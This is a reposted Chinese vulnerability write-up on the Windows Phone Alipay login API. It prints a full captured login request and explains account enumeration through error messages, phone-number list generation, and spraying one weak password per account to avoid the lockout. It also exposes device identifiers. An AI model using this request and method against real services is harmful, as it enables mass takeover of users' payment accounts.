电脑资料
当前位置:资料库>电脑资料>
我要投稿 投诉建议

阿里巴巴某登录接口设计不当撞裤没商量 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

    针对拥有大量用户资源的厂商这种撞裤越有危害,

阿里巴巴某登录接口设计不当撞裤没商量

    撞裤是一场需要用户参与的持久战,这种漏洞还是公开了比较好,让用户安全意识的重要性。

    所以就没向ASRC提交 :-)

    问题出在WindowsPhone移动端的支付宝钱包,登录没有限制(如验证码之类的)接着我们抓他的登录包

   

    我们可以看到登录帐号是明文显示在包中的,而包我们可以随意更改,也就是说我们可以随意更改尝试登录的帐号,不过这里可以看到密码部分是加密过的,想要知道算法恐怕得去逆向程序了,但是我们目的是撞裤,可以保持密码部分不变来批量撞帐号,使用弱密码依然用猪猪侠发的弱密码TOP100中的top6

    首先构造包

POST https://mobilegw.alipay.com/mgw.htm HTTP/1.1Accept: */*Content-Length: 1104Accept-Encoding: identitydid: dCLcmB/mO88BAWz2oVqhLlsCclientId: 8d19c072a4productId: WINPHONE_2NDCookie: zone=GZ00B;Domain=.alipay.com;Path=/,path=/Content-Type: application/x-www-form-urlencoded;charset=UTF-8User-Agent: NativeHostHost: mobilegw.alipay.comConnection: Keep-AliveCache-Control: no-cache

operationType=alipay.user.login&requestData=[{"loginId":"1588888888","loginType":"alipay","loginWthPwd":"withpwd","loginPassword":"p%2FzZD0Ppk%2FzQPItvn7snMMV%2FmVSlnhcaphtX6XRspjnuNC8gYZ6eEEJLHIfS8XMo%2BwUjFUTnqgKkzyJp%2FLYU66VtvAwVcsLeW7XomyAg7VKq%2FLevUHFlaUx3GlS0o%2FDfZ%2FOOTVjrKkfRIOSoefAo6JLUqVQAnl8uYHQ%2FmgMz67g%3D","loginCheckCode":"","tbCheckCodeId":null,"tbCheckCode":null,"productId":"WINPHONE_2ND","productVersion":"8.2.1.0806","osVersion":"3051.50009.1424.0002","userAgent":"0.5.0.1","channels":"wpstore","clientDigest":null,"secTS":"2020878325","deviceToken":null,"screenWidth":"480","screenHigh":"800","clientId":"46424041 |314875527246815","walletTid":"61059d609a482248c67be9cb0bccb90c0ec9da25a1be557aaf2c4d5f0c1b9bf3","walletClientKey":"46424041 |314875527246815","mspTid":"61059d609a482248c67be9cb0bccb90c0ec9da25a1be557aaf2c4d5f0c1b9bf3","mspImsi":"46424041 ","mspImei":"314875527246815","mspClientKey":"8d19c072a4","sourceId":null,"mac":"","cellId":null,"location":null,"vimsi":"46424041 ","vimei":"314875527246815","externParams":null,"operatorType":null}]

    哎呀,把我设备的各种信息都泄漏了,不过无所谓.. 在这个互联网谁还会有隐私呢 ?

    这里加密的密码部分明文应该是“woaini1314”那我们针对这个弱密码就可以批量撞帐号了,所以用户数量越大的厂商这类的撞裤命中率越高,弱密码可没办法防止,所以说撞裤漏洞是一场需要用户参与的持久战,

电脑资料

阿里巴巴某登录接口设计不当撞裤没商量》(https://www.unjs.com)。

    但是呢,大量的帐号哪里弄? 这很简单呀

    在登录的时候,在帐号处填写的手机号如果没有绑定支付宝的话就会显示“该账户不存在”,如果一个帐号存在的话我们尝试登录就会显示“密码输入错误”然后用字典工具生成11位的数字组合,前3位是号段,所以只要生成后8位就可以了

   

   

    那我们把上个测试迅雷撞裤的脚本稍微修改一下就能拿来用了

   

    如果有跑出来成功的就会保存在good.txt,为了节省时间我并没有真的去测试大量帐号,只是测试了我自己的帐号是否能成功,我把自己的支付宝密码改为了woaini1314,然后添加到usernames.txt,

   

    看看会不会被撞到,结果是成功撞到的。

   

    所以呢,针对这个弱密码还是可以撞到一部分用户的 。。

    其实阿里也是有措施防止撞裤的,每个帐号密码尝试次数为5次,如果错误五次就会锁定3小时

    但是我这里撞裤是针对密码来撞的,如果密码不正确就直接过了,所以只会尝试一遍..也就巧妙绕过了这个防护措施

解决方案:

    过滤

相关文章
最新文章
推荐文章

Copyright©2006-2026 优文网 unjs.com 版权所有 手机版